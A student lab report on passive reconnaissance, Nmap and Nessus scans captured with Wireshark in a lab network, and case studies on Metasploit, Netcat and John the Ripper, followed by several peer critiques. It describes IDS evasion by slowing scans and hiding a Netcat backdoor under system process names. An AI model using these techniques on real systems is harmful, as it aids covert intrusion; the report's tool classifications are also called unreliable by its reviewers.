Abstract
The first part of the lab is to research passive reconnaissance tools and how they operate. The students will identify if the tools can or cannot recreate the packet stream passively. The ability for tools to change the duration of their tests will be covered. The importance of the ability to change the duration of a test will also be discussed. The next part of the lab will include the research of scanning tools, such as Nmap and Nessus. These tools will be tested to see if their scanning results can be detected on another system using a packet sniffer. The student will also discuss operating system biases for these tools and how the exploits that they perform relate to the security tools grid. The methods and results of this test will be discussed in detail. For the last part of the lab, a set of case studies will be discussed, based on research of network penetration tools that have been exploited. The risks to the enterprise that use untested or exploited tools in penetration testing will also be discussed. The student will discuss all of their findings and report any issues and problems encountered in the lab.
Literature Review
Passive reconnaissance tools are tools that watch other systems without the victim system knowing that they are being watched. Passive reconnaissance tools can be used for blackbox testing as well as whitebox testing. Blackbox testing is the act of purposely injecting errors, from an outside perspective, into a system to find any problems within it. Whitebox testing is the same method as blackbox testing but it looks at the inside perspective. Both of the papers that were the required readings dealt with blackbox and whitebox testing. One does deal Privacy Oracle while another talks about random testing and blackbox vs whitebox testing.
Patrice Godefroid got invited to the 2007 annual meeting at Internal Workshop on Random Testing. The proceeding of her discussion can be found in the article called Random Testing for Security: Blackbox vs. Whitebox Fuzzing. In the first part of the article, Godefroid discusses the idea of blackbox fuzz testing. Fuzz testing is the act of randomly mutating well-formed inputs and testing the program on the resulting data (Godefroid, 2007, pg1). The author purposed an alternative to whitebox fuzz testing. The author setup a model for comparing whitebox fuzz testing to blackbox fuzz testing. In the conference the author makes the comparison to the audience of the conference. This is different from the idea that Jung et al brings up in their article about Privacy Oracle: a System for Finding Application Leaks with Black Box Differential Testing. Jung et al talks about their approach to find any information leaks with Privacy Oracle by using Black box differential testing as opposed to Godefroid proposal to use whitebox testing (Jung, 2008, pg279).
Godefroid believes that the best approach to testing an application or system is to look at the inside perspective of the attacks on them instead of the blackbox which looks at the attacks from the outside perspective. Godefroid introduced her idea of SAGE testing, which stands for Scalable, Automated, Guided Execution (Godefroid, 2007, pg1). The author goes on to talk about that in the early stages of this model that they have already found over 30 new bugs found in Window applications such as image processors, media players and file decoders (Godefroid, 2007, pg1). I think Godefroid may be right about her approach to whitebox testing. I think the best way to test the system is to see it from the inside perspective as opposed to blackbox testing, while looks at it from the outside perspective, which Privacy Oracle does.
Privacy Oracle is a tool that reports on application leaks of user information via the network traffic that they send. Privacy Oracle treats each application as a black box, without access to either its internal structure or communication protocols. This means that it can be used over a broad range of applications and information leaks Jung, 2008, p279). Jung et al found that right after the installation that Privacy Oracle found numerous information leaks when they tested 26 different popular applications. The main idea of Privacy Oracle is to look at some of the most common applications that people put on their personal computers and find what kind of information is leaked from these applications that can be used to steal their identity. While some of the information that can be found in these applications can be useful to help the individual, some of the information can be used for harmful activities (Jung,2008, p279).
Jung et al set out with a goal when writing this article and that is to help develop tools and techniques to help enable them find personal information leaks in the applications that they use (Jung, 2008, p279). This goal will be accomplished by the authors by creating and implementing a fully automated suite to find the exposure of personal information leaks in these applications. The first part of the test is to use Privacy Oracle to find the information leaks. The second part of the test is to study and take apart what information is leaked from the applications that Privacy Oracle tested (Jung, 2008, p280). The authors go into detail about how the blackbox difference testing with work in their experiment. The output analysis is studied and algorithms are used to determine the probability of the occurrence of the event happening and personal information is leaked from the application. One of the main algorithms used by the authors is the NetDialign, which is the authors’ take of Dialign. The tools that the authors studied and tested are as follows: Ad-Aware 2007, OneClick iPod Video Converter, Advanced WindowsCare, Real Player, AOL Internet Messenger, Spybot, Avant Browser, VersionTracker Pro. Avast Home Edition, IrfanView, AVG Anti-Virus Free Edition, iTunes Media Player, BearFlix, Limewire, BitComet, MediaCell Video Converter, Camfrog Video Chat, Morpheus, DivX, Windows Media Player, Gmail, WinRAR, ICQ, WinZip, Interactual Player, Yahoo! Messenger (Jung, 2008, p284).
Some of the findings that Privacy Oracle found is that in many of the applications tested asked for personal information such as e-mail address, name, age or gender. All of these items can be used to help steal the person’s identity or at least help someone else masquerade as the individual as far as the applications are concerned. The authors go on to discuss the effectiveness of Privacy Oracle as well as their algorithm called NetDialign. Although this group finds that whitebox testing is the better than blackbox testing, the Jung et al give a good counter side of why people would want to use blackbox testing. The authors state that the downside of this method of blackbox testing is that their method could have a bad effect of the programs that were tested. Privacy Oracle is a good tool use for blackbox testing but it does have its downside as many pieces of software do that perform penetration testing. It can raise the question does the software itself need to be tested before it can be used to test other application?
Methods Part 1
OSI 7 Layer Model Layer | Tool Name | McCumber Cube coordinate |
People /8 | Dumpster diving, social engineering | Confidentiality, processing, policy |
People/8 | Following FedEx, Telescope, binoculars, | Confidentiality, transmission, human |
People/8 | Stealing mail | Availability, storage, human |
Application /7 | Mbenum, netenum, psinfo, psfile, smtp-vrfy, amap, p0f,, sinfp, unicornscan, xprobe2, zenmap, pasco, sleuthkit, vinetto, | Confidentiality, storage, technology |
Application /7 | Getsids,halberd, httprint, httprint gui, metoscan, mescal http/s, mibble mib browser, onesixtyone, openssl-scanner, smb serverscan, vnc_bypauth, wapiti, 3proxy, gdb server, gnu ddd, | Confidentiality, processing, technology |
Application /7 | 0trace, relay scanner, | Confidentiality, transmission, technology |
Application /7 | Gfi languard, ascend attacker, cdp spoofer, | Integrity, processing, technology |
Application /7 | Goog mail enum, google-search, | Integrity, transmission, technology |
Application /7 | crunch dictgen, | Availability, processing, technology |
Presentation/6 | Finger google, googrape, maltego, metagoofil, bruteforcer,isr-form, list-urls, sidguess, collision, wyd, xspy | Confidentiality, storage, technology |
Presentation/6 | dcfldd, dd rescue, | Confidentiality, processing, technology |
Presentation/6 | Sql scanner, | Confidentiality, transmission, technology |
Session/5 | Airodump-ng, airsnort, | Confidentiality, storage, technology |
Session/5 | Packet, | Confidentiality, processing, technology |
Session/5 | Dnstracer, tcptraceroute, tctrace, ike-scan, , superscan, | Confidentiality, transmission, technology |
Session/5 | Thc pptp, tcpick, urlsnarf, hotspotter, karma, pcapsipdump, | Integrity, storage, technology |
Session/5 | carwhisperer, minicom, | Integrity, processing, technology |
Session/5 | sipdump, sip, | Availability, processing, technology |
Transport/4 | Dnswalk, mboxgrep, memfetch, | Confidentiality, storage, technology |
Transport/4 | snmp scanner, httpcapture, mailsnarf, smb sniffer | Confidentiality, transmission, technology |
Transport/4 | Icmp redirect, icmpush, igrp spoofer, irdp responder, irdp spoofer, wireshark, wireshark wifi, icmptx, pcaptpsip, | Integrity, processing, technology |
Transport/4 | Firewalk, | Integrity, transmission, technology |
Transport/4 | Smb dumpusers, | Availability, processing, technology |
Network/3 | dnspredict, subdomainer, angry ip scanner, | Confidentiality, storage, technology |
Network/3 | protos, | Confidentiality, processing, technology |
Network/3 | Ass, Autoscan, genlist, cryptcat,netdiscover, Whois, netdiscover, nmap, scanmetender, superscan, unicornscan, nhs nohack ,ping, protos, scanline, scanrand, revhosts, dnsspoof, driftnet, etherape,netsed, netenum, netmask, ntop, sing,smap, | Confidentiality, transmission, technology |
Network/3 | ltrace, yersinia, | Integrity, transmission, technology |
Network/3 | Spike, | Availability, processing, technology |
Data Link/2 | host, nmbscan, | Confidentiality, storage, technology |
Data Link/2 | Tftp brute, | Availability, processing, technology |
Physical/1 | wiassistant, hstest, | Integrity, transmission, technology |
Kinetic/0 | N/A | N/A |
Findings
Snort is a tool that is able to recreate the packet stream passively. The purpose of this is to be able analyze the data streams to find any signatures that indicate an attack is underway. Other IDS tools also have this ability. Another tool that has this ability is Netperf. This reason for this tool as well as any others that have the same ability is to ensure that if an attack occurs, the packet streams will be able to be recreated. One can make a script or tool slow down by setting the time for the attack to take longer. It all depends on the tool whether it is better for the attack to take longer than milliseconds. Generally, it will be easier to detect a script or tool if it takes milliseconds. If the tool or script takes longer, it will be harder for the data streams to be recreated because the attack traffic may appear to be legitimate traffic. Though, it will still be considered active as opposed to passive.
Methods Part 2A
First, Nessus and Nmap were installed on a Linux virtual machine running Ubuntu Linux. Invoking the following command performed the installation of Nessus and Nmap: “sudo apt-get install nmap nessus nessusd nessus-plugins”. Once these tools were installed, a registration code was required to update the plugins. The registration code was obtained from http://www.nessus.org/plugins/index.php?view=register. Next, Nessus was registered by entering the following command: “nessus-fetch -register [registration code]”. Next, the plugins were obtained using the “nessus-update-plugins” command. In order to run Nessus, a user account must be created in order to login to the Nessus server. Invoking the “nessus-adduser” command and entering a username and password created a Nessus user account.
In order to run Nessus, the nessusd daemon must be running (either on the local host or another server). The nessusd daemon was started by invoking the “sudo nessusd &” command (or it can be started using “/etc/init.d/nessusd start”). Nessus was then started using the “nessus &” command. Once the Nessus application had launched, it was logged into the server (running on the local host) using the credentials created with the nessus-adduser command. Next, under the “Plugins” section, all plugins were chosen. Then, under the “Targets” section, the IP address of a Windows XP SP3 virtual machine was used (192.168.1.1). The scan was then started and a report was created. Next, the command: “sudo nmap -sS -O 192.168.1.1” was used to perform the Nmap scan.
Findings
Nessus scans approximately 1000 types of vulnerabilities. This does allow an attacker sieve the information more quickly. This is because it only takes a few packets for Nessus to discover a vulnerable port on the target system. I think that if the Nessus vulnerabilities were put into a grid, like the tools have been in previous labs, patterns would emerge. Just like the security tools fit into the OSI model, the specific attacks will also fit. Different attacks will fit into the OSI model at different layers, depending on what protocols they are using and in what layer in the OSI model can they be exploited.
Nessus and Nmap have some biases based on the operating systems they test. Based on the numbers obtained from http://www.nessus.org/plugins/index.php?view=all, most of the vulnerabilities pertain to Windows operating systems (Tenable Network Security, 2009). However, there are plugins for testing all sorts of operating systems. I think the reasons for the large amount of plugins written that target Windows systems are because of the success of the operating system. People who use Nessus write the plugins. If there are more Windows clients and servers that need to be tested, there will be more plugins written to test those machines. When considering biases pertaining to Nmap, I think it follows a similar model. While Nmap simply looks for open ports, regardless of the operating system, the community controls the operating system detection. Users who submit known operating system fingerprints to the Nmap database can help to properly identify future OS detection in Nmap.
After the initial scans were performed, the scans were performed again. This time, the scans were captured using Wireshark. Before the captured scan was started, Wireshark was launched on a BackTrack virtual machine by typing “sudo wireshark &” into the terminal. Once Wireshark launched, it was set to capture all traffic on the eth1 interface, which is the adapter for the private network (192.168.1.0/24). Next, the Nessus security scan was started. Once the scan completed, all packets captured in Wireshark were saved and a report was created in Nessus. Then, in Wireshark, a new live capture was created. This time, Nmap was used to scan the Windows XP SP3 virtual machine. The command used to start the Nmap scan was: “sudo nmap -sS -O 192.168.1.1”. Once the scan was complete, the Wireshark capture was saved.
After reviewing the telemetry gathered by Nessus and Nmap, one can see that the scans can clearly be captured. Wireshark was chosen as the method for capturing network traffic instead of dsniff, because Wireshark is a general too, while dsniff looks for specific data in packets, such as passwords. Since all of the packets are captured in real time, both the packets being sent from the machine running the security-testing tool and the replies from the machine being audited can be seen. For instance, consider the following packet information, which was captured during the Nessus security scan with Wireshark:
Packet 1:
No. Time Source Destination Protocol Info
15 6.997810 192.168.1.2 192.168.1.1 TCP 55158 > 3com-tsmux [SYN] Seq=0 Win=5840 Len=0 MSS=1460 TSV=89034 TSER=0 WS=5
Frame 15 (74 bytes on wire, 74 bytes captured)
Ethernet II, Src: Vmware_bb:75:ac (00:0c:29:bb:75:ac), Dst: Vmware_76:2e:9a (00:0c:29:76:2e:9a)
Internet Protocol, Src: 192.168.1.2 (192.168.1.2), Dst: 192.168.1.1 (192.168.1.1)
Transmission Control Protocol, Src Port: 55158 (55158), Dst Port: 3com-tsmux (106), Seq: 0, Len: 0
Packet 2:
No. Time Source Destination Protocol Info
16 6.997931 192.168.1.1 192.168.1.2 TCP 3com-tsmux > 55158 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
Frame 16 (60 bytes on wire, 60 bytes captured)
Ethernet II, Src: Vmware_76:2e:9a (00:0c:29:76:2e:9a), Dst: Vmware_bb:75:ac (00:0c:29:bb:75:ac)
Internet Protocol, Src: 192.168.1.1 (192.168.1.1), Dst: 192.168.1.2 (192.168.1.2)
Transmission Control Protocol, Src Port: 3com-tsmux (106), Dst Port: 55158 (55158), Seq: 1, Ack: 1, Len: 0
Of course, what is shown above is not all of the packet data (though all of the packet data WAS captured), but one can see both parts of the communication. Also, detecting that this is in fact a Nessus scan is easy, due to the fact that it runs through many different ports and protocols very quickly. The same technique works with Nmap. Using this data, an attacker can simply search the capture file for all protocols or ports they are known to be vulnerable or easily exploitable and read the packet data to determine the outcome of that port or protocol’s security test. As long as the vulnerability types are known, a port/protocol list can be used and when this traffic matches activity on the network, it can be determined that a Nessus scan did, in fact, occur. Studying the Nessus traffic is important for an attacker. Even if a Nessus scan occurs, if the network is already saturated with data, it may be difficult to sieve all of the important information. Therefore, an attacker should study how Nessus operates, to understand what packets are used and how many are used to determine vulnerabilities, in order to find meaningful data amongst much meaningless data.
What can one use the capturing of legitimate data for? Capturing legitimate data can be used by an attacker to discover vulnerabilities in the network without allowing their presence to be known. In addition to simply capturing all data on a network and waiting for a Nessus scan to occur, there is an easier way to obtain this important data without capturing all data. A tool such as Snort can detect when a port scan is occurring and can be configured to generate alerts or run commands when detected. This tool could detect the Nessus scan and then begin to capture all packets to and from the machine running Nessus. When an attacker performs an Nmap or Nessus scan against a network, it’s a good idea to slow down the attack to prevent an IDS system from detecting the scan. This method may also be beneficial to security testers to help prevent attackers from obtaining telemetry from the scan and exploiting it before the security tester can properly patch the security holes.
The results of this test show that it is, in fact, possible to gain telemetry from an active tool by using a passive tool. This is because both the request and response can be captured, and therefore dissected in order to recover the results of the scan. This test also concludes that tools such as dsniff are not as effective because of their specific nature for retrieving certain types of data rather than packet all of the packets sent to and from a machine running Nessus, like Wireshark does. However, when considering the infiltration of legitimate security audits, IDS tools such as Snort may provide a good method to automatically sift out unimportant packets. This lab indicates the importance of viewing the packets used in a Nessus scan to determine how to detect a scan and how to determine vulnerabilities using a passive tool rather than an active tool. This is important because it allows an attacker to remain silent on the network while performing a reconnaissance attack. This, of course, raises the question “How does one detect an attacker performing active reconnaissance or, at least, minimize the information available to the attacker.” While machines in promiscuous mode can be detected, it can sometimes be difficult to detect. Therefore, machines in promiscuous mode should be searched for, but the existence of an undetected promiscuous node should still be assumed. Also, active security tests should be performed, as an attacker would. By minimizing the obviousness of a security test being performed, the likeliness of an attacker using passive reconnaissance exploiting this telemetry will also me minimized.
Part 2B
Open-source tools are an economical way to test the security of your network; unfortunately they’re available to both ethical and unethical attackers. (Ballard, 2006).
The good news is that there are plenty of open-source tools available to test the security of networks and alter network settings. They’re freely available as part of OS or over the Internet, and they usually cover a wider range and scope than off-the-shelf security products. And, often, these open-source tools have more features than comparable commercial options (though this can mean more complexity). In general, these tools are easy to acquire and install (Ballard, 2006).
The bad news is that would-be attackers know about and have access to these tools, too. Therefore, it’s imperative that one must know how intruders can use these tools against them and how to recognize when one is at work in your network.
Open-source network security tools fall into three main categories: those that probe the network; those that listen on the network; and those that alter the network (Ballard, 2006).
Although my research led me to a variety of open source penetration tools that have now become attack tools I’m focusing on Metasploit, John The Ripper 1.0, and NetCat.
Metasploit
Metasploit is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. To the average user, one of the great mysteries of computing is how hackers and security researchers discover vulnerabilities in applications. There really are no special techniques needed to find vulnerabilities; it just takes a lot of experience and knowledge (http://sectools.org/sploits.html).
Metasploit was originally released as a research; however, Metasploit will certainly find use within the hacker community. Like other virus and worm “toolkits” circulating freely, Metasploit allows people with limited abilities to leverage the skills of others to create hostile code to exploit vulnerabilities in applications and operating systems, including all major Windows versions (http://sectools.org/sploits.html).
There’s no doubt that Metasploit makes it almost trivial to create hostile code. For security researchers and administrators, it’s undoubtedly a great way to proactively detect flaws in their applications and learn how to better defend networks against attacks. When it comes down to it, hackers already have this understanding. But tools such as Metasploit, while presenting the potential for abuse, also have the potential to teach–and empower the good guys with the knowledge the hackers already have.
Case Study
This case study describes how H.D Moore and his Metasploit colleagues created an exploit of the now-patched Vector Markup Language, or VML, vulnerability in Internet Explorer. This exploit was undetected by 26 virus scanning engines, including those from Kaspersky, McAfee, Microsoft, and Symantec. Moore also created a zero-day exploit-one unleashed before there’s a known remedy to take advantage of vulnerability in Microsoft’s Windows Metafile. This prompted Microsoft to take the unusual step of releasing a patch five days ahead of its software-patch schedule. Even though Moore added to his prestige and forced Microsoft to fix its problem sooner, he also left Internet Explorer more vulnerable than if he’d worked discreetly with Microsoft (Greenemeir, 2006).
There are two ways to look at Moore and his team. They either give malicious hackers better ability to attack customers of Microsoft and other popular products; or they show tough love to software companies so they’ll produce more-secure products.
NetCat
Netcat is one of the most commonly used anti-hacking tools. Netcat makes and accepts Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections. Netcat writes and reads data over those connections until they are closed. It provides a basic TCP/UDP networking subsystem that allows users to interact manually or via script with network applications and services on the application layer. It lets users see raw TCP and UDP data before it gets wrapped in the next highest layer such as File Transfer Protocol (FTP), Simple Mail Transfer Protocol (SMTP), or Hypertext Transfer Protocol (HTTP) (http://technopedia.info/tech/2006/02/22/everything-you-need-to-know-about-netcat.html).
However, there is a gaping security hole in Netcat. This can make Netcat dangerous in the wrong hands.
Case Study:
This case study is about how hackers run Netcat. The evil attacker creates a copy of Netcat called iexplore.exe and runs a backdoor listening on TCP port 2222. Users or administrators searching for a malicious process would likely overlook this extra little goodie running on the box, as it looks completely reasonable. Giving a backdoor a name like iexplore.exe is pretty sneaky. However, an attacker could do something even worse by taking advantage of an interesting characteristic of Windows 2000, XP, and 2003. In these operating systems, the Task Manager won’t allow you to kill processes that have certain names. If a process is named winlogon.exe, lsass.exe, the system automatically assumes that it is a sensitive operating system process based solely on its name.
John The Ripper 1.0
John the Ripper 1.0 (JTR) is a free password-cracking program popular with hackers and security experts. The program was actually designed for the legitimate use of finding and cracking the feeble password with a view to improve the security of the system by entering a stronger password. But the program has found its place within the hacker’s world (http://sectools.org/sploits.html).
Provide JTR with an encrypted password file, and it will rip the file apart until it knows every password for every user on your network. JTR employs methods such as dictionary attacks, where it tries thousands of words from a wordlist in hopes of finding a match, or brute force, where it systematically experiments with millions of character combinations until it stumbles upon a password.
Case Study
How do most professional hackers use John the Ripper (JTR)?
It depends on what they are trying to achieve. If they just want to prove a point JTR in single crack mode can reveal the weakest passwords in seconds and demonstrates the need for good password policy. Most use longer runs when they want to leverage the passwords they find to get deeper.
From what I read it seems that most use JTR mostly on Linux. They use it for both, a single password and groups of passwords cracking and typically don’t run it for more than a few days; however depending on how many hashes they get from a box is how many they run JTR on, and will continue to run it on a non production machine until the engagement is close to reporting.
It depends on what you are trying to achieve. If you just want to prove a point JTR in single crack mode can reveal the weakest passwords in seconds and demonstrates the need for good password policy. I use longer runs when I want to leverage the passwords I find to get deeper.
Are there ways to ensure the tools you are using are not hostile?
Only approved software should be operated on the organization’s network. This is so hostile programs cannot gain access to the network. Hostile programs may be written with some useful functionality, but may perform a hidden task that the user is not aware of. The ways to help determine whether a program is hostile include:
- Does the program come from a reliable source?
- Is there proof that the program came from the source such as a digital signature?
- If the source code is available for the program, the code may be checked to be sure there is no hostile content.
- A reliable third party may be able to check out the software and certify that it is safe.
- Does the creator of the program attempt to hide their identity? If the creator of the program attempts to hide their identity then there may be reason for suspicion. If the program creator does not hide their identity and can be reached, it is less likely that the program is a hostile program.
- Has this program been run by other people or organizations for some period of time with no adverse consequences?
Some of the above issues are not proof that a program is safe, but are merely indicators. Computer security is not an exact science and it is a matter of reducing the chance of an intrusion. Probably the best method of being sure of the reliability of a program is to allow a reliable third party to check the program. Program writers may even send source code to these service providers for certification with source code covered by a nondisclosure agreement.
What is the process of source code auditing?
Software vulnerabilities are a growing problem. Moreover, many of the mistakes leading to vulnerabilities are repeated often. Source code auditing tools could be a great help in identifying common mistakes, or in evaluating the security of software. The effectiveness of the auditing tools can be assessed by using the following criteria: number of false positives, false negatives by comparison to known vulnerabilities, and time required to validate the warnings related to vulnerabilities. In small and medium scale projects, the open source program Pscan can be useful in finding a mix of coding style issues that could potentially enable string format vulnerabilities, as well as actual vulnerabilities. The limitations of Pscan were more obvious in large-scale projects like OpenBSD, as more false positives occurred. Clearly, auditing source code for all vulnerabilities remains a time-consuming process, even with the help of the current tools, and more research is needed in identifying and avoiding other common mistakes. (2008, Heffley,Meunier). Auditing source code in an enterprise wide environment would be extremely time consuming.
What are the risks of using untested or exploited penetration tools?
Penetration testing can be an invaluable technique to any organization’s information security program. Basic white box penetration testing is often done as a fully automated inexpensive process. However, black box penetration testing is a labor intensive activity and requires expertise to minimize the risk to targeted systems. At a minimum, it may slow the organization’s networks response time due to network scanning and vulnerability scanning. The possibility exists that systems may be damaged in the course of penetration testing and may be rendered inoperable, even though the organization benefits in knowing that the system could have been rendered inoperable by an intruder. Although this risk is mitigated by the use of experienced penetration testers, it can never be fully eliminated (http://www.bankinfosecurity.com/html/webinar-penetration-testing.html)
Issues and Problems
The only issues with the lab had to do with the Linux virtual machine. On the Debian virtual machine, after installing so many packages like Xorg, fluxbox and the plugins to get Nessus to work, the drive ran out of space and mounted as read-only. As a workaround an Ubuntu virtual machine was created and had more space allocated.
Conclusions
In conclusion, this lab was very informative. It required the group to think more critically about tools that perform passive reconnaissance. The lab required that the group research passive tools, information pertaining to the timing of active tools and the relationship between those tools. The group discovered that if the tools take longer to run, they are less likely to be detected. When considering Nessus and Nmap, the group discovered that the data streams can be captured in order to passively obtain the vulnerabilities returned from Nessus. The research gathered helped the group answer questions pertaining to what this kind of attack means to attackers and security auditors alike. Finally, the group researched how security tools have, themselves, been vulnerable to attack. Also, the group discussed what risks are involved to enterprises when security-testing tools are not security tested.
Bibliography
“Crash Course: Open-Source Security Tools a Double-Edged Sword – Security – Network Computing.” Network Computing – Computer Networking, Network Security and Management. 26 June 2009 <http://www.networkcomputing.com/showitem.jhtml?docid=1712crash>.
“Everything you need to know about Netcat | Tech Pedia.” Technopedia. 26 June 2009 <http://technopedia.info/tech/2006/02/22/everything-you-need-to-know-about-netcat.html>.
Godefroid, P. (2007). Random Testing for Security:Blackbox vs. Whitebox Fuzzing. Paper presented at the Second International Workshop on Random Testing, Atlanta Georgia.
Greenemeier, Larry. “Is The Metasploit Hacking Tool Too Good? — IT Security And Hackers — InformationWeek.” InformationWeek | Business Technology News, Reviews and Blogs. 26 June 2009 <http://www.informationweek.com/news/infrastructure/management/showArticle.jhtml?articleID=193401125>.
Heffley, John, and Pascal Meunier. “Can Source Code Auditing Software Identify Common Vulnerabilities and Be Used to Evaluate Software Security?” The IEEE Computer Society. 26 June 2009 <http://www2.computer.org/portal/web/csdl/doi/10.1109/HICSS.2004.1265654>.
Jung, J. S., Anmol; Greenstein, Ben; Wetherall, David. (2008). Privacy Oracle: a System for Finding Application Leaks with Black Box Differential Testing.
“Making the Case for Penetration Testing.” Banking Information Security News, Regulations, White Papers, Webinars, & Education – BankInfoSecurity.com. 27 June 2009 <http://www.bankinfosecurity.com/html/webinar-penetration-testing.html>.
Tenable Network Security. (2009). Plugins. Retrieved June 27, 2009, from www.nessus.org: http://www.nessus.org/plugins/index.php?view=all
“Top 3 Vulnerability Exploitation Tools.” Top 100 Network Security Tools. 26 June 2009 <http://sectools.org/sploits.html>.
The abstract, while not a major part of the lab exercises is more of a restatement of the objectives than a summary of the activities performed in the lab. The literature review has a few spelling and grammatical errors that make it slightly difficult to read. One major criticism is the difference between blackbox and whitebox testing is not explored in depth enough. Saying that whitebox testing “looks at the inside perspective” doesn’t really tell the reader much about whitebox testing. Inside of what? Another major criticism is only looking at the topic of passive reconnaissance in light of the readings given out with the lab exercises. Passive reconnaissance is much more than blackbox and whitebox application testing. The lab exercises are a good example of passive reconnaissance against a network.
It would’ve been nice to see methodologies before presenting the table with passive attack tools to give the reader a reference for how the information was gathered and formatted. Maybe that would explain the presence of tools that are most definitely active reconnaissance tools in the table such as XProbe2 (a port scanner and TCP/IP fingerprinting tool) and GFI LanGuard (a network security scanner.)
The findings paragraph mentions tools that are not in the table. Are these finding separate from the work done to create the table? The last part of the findings section regarding timing of the attack or script traffic is weak. It describes what may happen when delaying the traffic from a program or script of an active reconnaissance tool but doesn’t view this information in light of the subject of passive reconnaissance. The statement that it will be “easier to detect a script or tool if it takes milliseconds” needs some backing. What if the attack is so fast that it’s missed by the IDS system that only samples every couple of seconds?
The findings for part 2a were insufficiently detailed. How does the fact that Nessus scans for 1000s of vulnerabilities allow an attacker to sieve through the information more quickly? How do you know it only takes a few packets to discover a vulnerable port? What patterns might emerge from putting the vulnerabilities Nessus finds into a table? The operating system bias is valid but what other patterns might emerge? Are there any cross platform vulnerability types that occur more than others?
I think the point of 2b was missed entirely. The point of this exercise was to evaluate tools that had been advertised and published as security tools but had secret backdoors installed that compromised the systems of the attacker. The section of 2b where determining whether or not a tool is hostile is on the right track with the purpose of this part of the exercise. Finally, the citation for “Precision and accuracy of network traffic generators for packet-by-packet traffic analysis” isn’t properly formatted in APA5.
Team one did a decent job in explaining what was going to be accomplished in the lab. The Abstract did not meet the requirements as per the syllabus in length, and did read more like the list of objectives in the lab three design guide. However, the abstract explained the tasks that will be performed in lab three. In the literature review section, team one began with an introduction explaining what the general topics of the articles in the literature review were, and then went right into the first article, the articles from Patrice Godefroid. From the literature review it is apparent that team made an attempt to create cohesion between the articles which should have been simple as there were only two of them, and the second one seemed to pick up where the first left off. That attempt however did not end in success but rather team one has once again created a list of the thoughts presented in each article almost entirely independent of each other explaining what the article was about, followed by the literature review author’s personal opinion on each article. There appears to be no attempt to answer the questions presented in the syllabus for literature review, and no attempt to integrate the literature into the lab. I call into question the sentence that begins “Some of the findings that Privacy Oracle found.” The tool found findings? In my experience researchers generate findings from data created by the tools they use. The methods section of team one’s lab jumps right into the table that needed to be created as per part one of lab three with no explanation of what is going on outside of the abstract in the beginning. I question team one placing Stealing mail as a passive attack. Stealing mail would be the same intercepting and diverting a network packet, the act of not getting the packet (or parcel) means that the victim would be aware of the attack making it active and not passive in nature. Each part of the lab is broken down into a methods and findings section for each particular section of the lab. This does not create a lab document that flows from beginning to end, and allow others to recreate the experiments of lab three in any meaningful way, nor does it follow the guidelines as per the syllabus. There are no unified methods or findings section, and that left me confused upon first reading. The methods that team one does present are lacking and are not at all a form of academic or scientific methods and fail to explain their strategy or techniques in answering the questions they were presented in the lab design document. A unified findings section appears to be at least attempted, but after review it is apparent that the three members of team one did not collaborate well in the creation of a final lab document. Team one states in their findings that nessus and nmap have a bias towards windows machines; team three later states that nessus and nmap have a bias towards UNIX style machines. This calls into question both teams’ results as either a guess or lack of understanding of the lab. Team one’s case studies seem to suggest a lack of understand of that particular part of the lab. They present tools that “hackers” are known to generally use, and how they use them. This was not the goal, but rather the goal was studying tools used as security defense tools that were themselves at one point or another the attack vector in an exploit, tools that turn the attacker into the attacked.
Team one’s effort this week is an improvement over last week. There is an issue with a change in voice, and the authors should be weary of writing in the first person singular.
Your literature review thoroughly summarizes the articles, and the group makes an attempt to evaluate the literature as well as relate it to the labs. You use first person singular voice in the literature review, but there are three of you in the group. It wouldn’t be a big deal, except that the author submits an opinion. Do all of you agree or has one of your members gone rogue? I find it interesting that this group was able to glean so much from the Godefroid article, given that it was an abstract to a presentation. Is there a relationship between Jung et al and passive scanning in particular?
The section covering Part 1 is very vague. I’m unclear as to what your methods are here, and what the table represents. Are all the tools listed supposed to passive reconnaissance tools? I don’t understand how your findings relate to the table.
Part 2A is completely different. The methods section is written well. Screenshots would be nice but aren’t really necessary since these are command line tools. I think I could repeat the experiment with the given steps. I like that you based your thoughts on the tools being biased on numbers from documentation rather than one test of one operating system. Your set up for the second scan should be in the methods section but it is still very detailed and easy to follow. Your analysis of the passive scan was exceptionally detailed and very well done.
In Part 2B, where did you get the information for your case study? What about exploiting vulnerabilities in penetration tools themselves? You give good examples of tools that are used in or to create exploits, but the idea was to look into the issue of the tool being used against the operator. In your prevention methods, you advocate the use of digital signatures. Is there a chance the signature could be forged? Can a reliable source be compromised without their knowledge? Creators of open source tools may have perfectly legitimate reasons for wanting to keep their identity a secret. What if the tool created is considered by some governments to be a weapon, for example? I don’t think it’s valid to use a desire for anonymity as basis for judging the safety of a tool. If you outsource code auditing, what is the potential that something will be missed? Who is liable? Does this process become more difficult with increased complexity of the code? You ask the question, “What are the risks of using untested or exploited penetration tools?” but the paragraph that follows doesn’t really answer the question, or even have much to do with it.
I would comment that I thought the literature review to be decently put together. I believe this group excelled in comparing the two articles given in a head-to-head fashion: something which few other groups attempted. The way in which this literature review was written made for fairly easy reading; although I found the use of the first person in certain areas to be out of place. I thought the ‘Findings’ section to attempt a reasonably detailed examination of Part 1: certainly a step in the right direction. Additionally, I found the discussion of Part 2B, that on exploits in security tools, to be nicely done, even if I cannot agree entirely with some of the ideas presented. Finally, commendable effort in ‘presentation’ is noticeable from this team; in this regard I believe this team to be continually improving.
These positive points aside, numerous problems were detected in this write-up: some relatively trivial, others severe, possibly fundamental errors. First, I found the use of ‘the student’ a strange choice in wording for the abstract section: this reads like a lab instruction sheet, and not an abstract; consider using ‘we’ or using a personal passive voice, such as “the biases were determined” or “tools were identified.” Additionally, I found no ‘methodology’ or ‘procedure’ detailed under the ‘Methods’ section for Part 1, but found what appeared to be the ‘results’ listed instead. Furthermore, this table of ‘passive’ tools did not appear to be well conceived. I noted ‘ping’ listed, along with a number of ‘spoofers’ and active scanners (‘superscan,’ ‘unicornscan,’ etc.). I would ask: how can you possibly classify ‘ping’ as a ‘passive’ tool? It appears to me that little research effort went into assembling this tool listing, as many tools included are of an obvious ‘active’ nature. Additionally, I tried to rectify these dubious tools to some logically consistent pattern in the report, i.e. did the team present that ‘slowing’ an ‘active’ tool could reclassify it as ‘passive?’ Conclusively, this could not be an explanation: they are adamant in asserting that ‘speed’ does not change the nature of the tool: hence, these are likely errors.
